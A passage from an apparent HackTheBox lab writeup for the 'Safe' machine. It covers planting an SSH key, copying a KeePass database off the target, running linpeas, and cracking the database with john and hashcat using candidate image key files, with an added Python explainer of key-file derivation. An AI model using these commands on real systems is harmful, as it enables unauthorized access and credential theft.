class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">ls</span>\nmyapp\nMyPasswords.kdbx\nuser.txt</code></pre></div>\n<p>However, the victim machine had no curl, ftp, or Python available.</p>\n<p>So I used ssh and scp instead: drop a public key into the user’s <code class=\"language-text\">authorized_keys</code> from the shell obtained above (append rather than overwrite, so any keys already there are not clobbered), then pull the file with scp.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">mkdir</span> -p ~/.ssh <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">chmod</span> <span class=\"token number\">700</span> ~/.ssh\n$ <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"&lt;pub key>\"</span> <span class=\"token operator\">>></span> ~/.ssh/authorized_keys <span class=\"token operator\">&amp;&amp;</span> <span class=\"token function\">chmod</span> <span class=\"token number\">600</span> ~/.ssh/authorized_keys\n\n$ <span class=\"token function\">scp</span> user@<span class=\"token variable\">$RHOST</span>:/home/user/MyPasswords.kdbx ./</code></pre></div>\n<p>This allowed me to retrieve <code class=\"language-text\">MyPasswords.kdbx</code>.</p>\n<p>I also sent <code class=\"language-text\">linpeas.sh</code> for further enumeration.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">scp</span> /home/kali/Hacking/Tools/linpeas.sh user@<span class=\"token variable\">$RHOST</span>:/home/user</code></pre></div>\n<p>I confirmed that the file type of <code class=\"language-text\">MyPasswords.kdbx</code> is “Keepass password database 2.x KDBX.”</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">file</span> MyPasswords.kdbx \nMyPasswords.kdbx: Keepass password database <span class=\"token number\">2</span>.x KDBX</code></pre></div>\n<p>According to this article, <code class=\"language-text\">keepass2john</code> extracts a crackable hash from the KDBX header, and hashcat (mode 13400) or john can then attack it:</p>\n<p>Reference: <a href=\"https://davistechmedia.com/can-you-crack-a-keepass-database-if-you-forgot-your-password/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Can You Crack a KeePass Database if You Forgot Your Password? 
- Davis Tech Media</a></p>\n<p>I tried cracking with the following command, but it took a terribly long time. KDBX 2.x runs the composite key through a large number of key-transformation rounds (the second field of the <code class=\"language-text\">$keepass$</code> line), so every single guess is expensive.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ keepass2john MyPasswords.kdbx <span class=\"token operator\">></span> dbhash.txt\n<span class=\"token comment\"># DBNAME:$keepass$....</span>\n$ <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^.*://g'</span> dbhash.txt <span class=\"token comment\"># Remove DBNAME (hashcat wants the bare hash)</span>\n\n$ hashcat -a <span class=\"token number\">0</span> -m <span class=\"token number\">13400</span> dbhash.txt /usr/share/wordlists/rockyou.txt</code></pre></div>\n<p>It took about 12 hours in the end, but there was no matching password in the rockyou wordlist. john with the same list and a hashcat mask over lowercase letters and digits were the next attempts; at this cost per guess, an incremental mask of up to ten characters is hopeless anyway.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ john --wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt dbhash.txt\n$ hashcat -m <span class=\"token number\">13400</span> dbhash.txt -a <span class=\"token number\">3</span> -1 ?l?d ?1?1?1?1?1?1?1?1?1?1 --increment</code></pre></div>\n<p>After more research it became clear that a password-only attack could not succeed here: trying to open the KDBX in KeePassXC made clear that a key file was also required. The KDBX format does not record whether a key file was part of the master key, so a cracker run without it simply never matches; a long run with no hit on a decent wordlist is itself a hint to look for one.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 814px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e82f63b6914d682cfebe166aa6f63ddd/a4262/image-20220722231645914.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); 
background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e82f63b6914d682cfebe166aa6f63ddd/8ac56/image-20220722231645914.webp 240w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/d3be9/image-20220722231645914.webp 480w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/f23e7/image-20220722231645914.webp 814w\"\n              sizes=\"(max-width: 814px) 100vw, 814px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e82f63b6914d682cfebe166aa6f63ddd/8ff5a/image-20220722231645914.png 240w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/e85cb/image-20220722231645914.png 480w,\n/static/e82f63b6914d682cfebe166aa6f63ddd/a4262/image-20220722231645914.png 814w\"\n            sizes=\"(max-width: 814px) 100vw, 814px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e82f63b6914d682cfebe166aa6f63ddd/a4262/image-20220722231645914.png\"\n            alt=\"image-20220722231645914\"\n            title=\"image-20220722231645914\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I wasn’t familiar with this, but the KeePass documentation explains that the master key of a database can be a master password, a key file, or a combination of the two.</p>\n<p>Requiring both makes opening the KDBX two-factor: the password is something you know and the key file something you have. A key file is just a file; KeePass uses a 32-byte file as-is, decodes a 64-character hex file, and for anything else takes the SHA-256 hash of the file contents, so any file on disk, a JPEG included, can serve as a key file.</p>\n<p>Reference: <a href=\"https://keepass.info/help/base/keys.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Master Key - KeePass</a></p>\n<p>So I assumed the suggestively placed image files were the key files and tried cracking the hash again with each of them.</p>\n<p>keepass2john takes the key file with <code class=\"language-text\">-k</code>, so I generated one candidate hash per image (commands below).</p>\n<div class=\"gatsby-highlight\" 
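data-language=\"bash\"></div>\n<p>Why an arbitrary JPEG can be a key file, as an added example that is not part of the writeup or of KeePass itself: the function below derives the key-file component the way the Master Key page describes (XML key file, raw 32 bytes, 64 hex characters, otherwise SHA-256 of the whole file) and folds it into the composite key together with the password. That 32-byte component is what <code class=\"language-text\">keepass2john -k</code> embeds in the hash it emits, so the cracker only has to guess the password. The sample inputs are constructed, not the files from the box.</p>

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

# Added example, not code from the writeup or from KeePass: how a KeePass 2.x
# key file becomes key material.  The rules follow the Master Key page linked
# above, in the order KeePass tries them.


def keyfile_component(data):
    # 1. XML key file (version 1.x): base64 in KeyFile/Key/Data
    try:
        root = ET.fromstring(data)
        node = root.find('Key/Data')
        if root.tag == 'KeyFile' and node is not None and node.text:
            return base64.b64decode(node.text.strip())
    except (ET.ParseError, ValueError):
        pass
    # 2. exactly 32 bytes: used as-is
    if len(data) == 32:
        return data
    # 3. 64 hex characters: decoded to 32 bytes
    if len(data) == 64:
        try:
            return bytes.fromhex(data.decode('ascii'))
        except ValueError:
            pass
    # 4. anything else (a JPEG, say): SHA-256 of the whole file
    return hashlib.sha256(data).digest()


def composite_key(password, keyfile=None):
    # Each key source is hashed on its own, the hashes are concatenated and
    # hashed again; the KDBX key-transformation rounds then work on this.
    parts = hashlib.sha256(password.encode('utf-8')).digest()
    if keyfile is not None:
        parts += keyfile_component(keyfile)
    return hashlib.sha256(parts).digest()


# Constructed inputs for the four shapes (not the files from the box).
RAW_KEY = bytes(range(32))
HEX_KEY = RAW_KEY.hex().encode('ascii')


def _xml_keyfile(key):
    # Builds a version 1.x XML key file around the given 32 bytes.
    root = ET.Element('KeyFile')
    ET.SubElement(ET.SubElement(root, 'Meta'), 'Version').text = '1.00'
    data = ET.SubElement(ET.SubElement(root, 'Key'), 'Data')
    data.text = base64.b64encode(key).decode('ascii')
    return ET.tostring(root)


XML_KEY = _xml_keyfile(RAW_KEY)
JPEG_LIKE = bytes([0xff, 0xd8, 0xff, 0xe0]) + b'JFIF' + bytes(200)  # fake JPEG header

if __name__ == '__main__':
    for name, blob in [('raw', RAW_KEY), ('hex', HEX_KEY),
                       ('xml', XML_KEY), ('jpeg', JPEG_LIKE)]:
        print('%-4s %s' % (name, keyfile_component(blob).hex()))
    print('composite, password only :', composite_key('secret').hex())
    print('composite, with jpeg key :', composite_key('secret', JPEG_LIKE).hex())
```

<p>Version 2.0 XML key files (hex data with a hash attribute) are not handled here. The practical consequence for this box: the cracker has to be given the exact bytes of the right image, and any re-encoding, resizing or metadata change to the JPEG alters its SHA-256 and silently breaks the key. The keepass2john commands from the writeup follow.</p>\n<div class=\"gatsby-highlight\" 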
data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">scp</span> user@<span class=\"token variable\">$RHOST</span>:/home/user/IMG* ./\n\n<span class=\"token comment\"># One hash without a key file, then one per candidate key file (-k)</span>\n$ keepass2john MyPasswords.kdbx <span class=\"token operator\">></span> dbhash.txt\n$ <span class=\"token keyword\">for</span> f <span class=\"token keyword\">in</span> IMG*.JPG<span class=\"token punctuation\">;</span> <span class=\"token keyword\">do</span> keepass2john -k <span class=\"token string\">\"<span class=\"token variable\">$f</span>\"</span> MyPasswords.kdbx <span class=\"token operator\">>></span> dbhash.txt<span class=\"token punctuation\">;</span> <span class=\"token keyword\">done</span></code></pre></div>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/45788336/produce-a-hash-from-keepass-with-keyfile\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">hashcat - Produce a Hash from Keepass with Keyfile - Stack Overflow</a></p>\n<p>I then used john to crack the generated hashes (the wordlist goes in <code class=\"language-text\">--wordlist</code>; a bare second path would be read as another hash file).</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ john --wordlist<span class=\"token operator\">=</span>/usr/share/wordlists/rockyou.txt dbhash.txt</code></pre></div>\n<p>One of the lines cracked; matching it back to the image that produced it identifies the key file. Opening the database in KeePassXC with the cracked password and that IMG file as the key file gave me the root password.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/799241d4a513dbbbee673b4cd5aad48f/bb051/image-20220723003851638.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 53.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/799241d4a513dbbbee673b4cd5aad48f/8ac56/image-20220723003851638.webp 240w,\n/static/799241d4a513dbbbee673b4cd5aad48f/d3be9/image-20220723003851638.webp 480w,\n/static/799241d4a513dbbbee673b4cd5aad48f/e46b2/image-20220723003851638.webp 960w,\n/static/799241d4a513dbbbee673b4cd5aad48f/0dc00/image-20220723003851638.webp 1212w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/799241d4a513dbbbee673b4cd5aad48f/8ff5a/image-20220723003851638.png 240w,\n/static/799241d4a513dbbbee673b4cd5aad48f/e85cb/image-20220723003851638.png 480w,\n/static/799241d4a513dbbbee673b4cd5aad48f/d9199/image-20220723003851638.png 960w,\n/static/799241d4a513dbbbee673b4cd5aad48f/bb051/image-20220723003851638.png 1212w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/799241d4a513dbbbee673b4cd5aad48f/d9199/image-20220723003851638.png\"\n            alt=\"image-20220723003851638\"\n            title=\"image-20220723003851638\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This gave me the root flag.</p>\n<p>Exhausting…</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" 
width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>This was a BOF challenge: a non-PIE, NX-enabled binary with no canary, solved with a two-stage ROP chain (leak a libc pointer out of the GOT, identify the libc build from the leak, then <code class=\"language-text\">system(\"/bin/sh\")</code> via <code class=\"language-text\">pop rdi; ret</code>), followed by cracking a KeePass database whose second factor was an image file sitting in the same home directory.</p>","fields":{"slug":"/hackthebox-linux-safe-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-06-12","description":"A writeup of the retired HackTheBox machine 'Safe'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Safe (Easy/Linux)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-safe-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}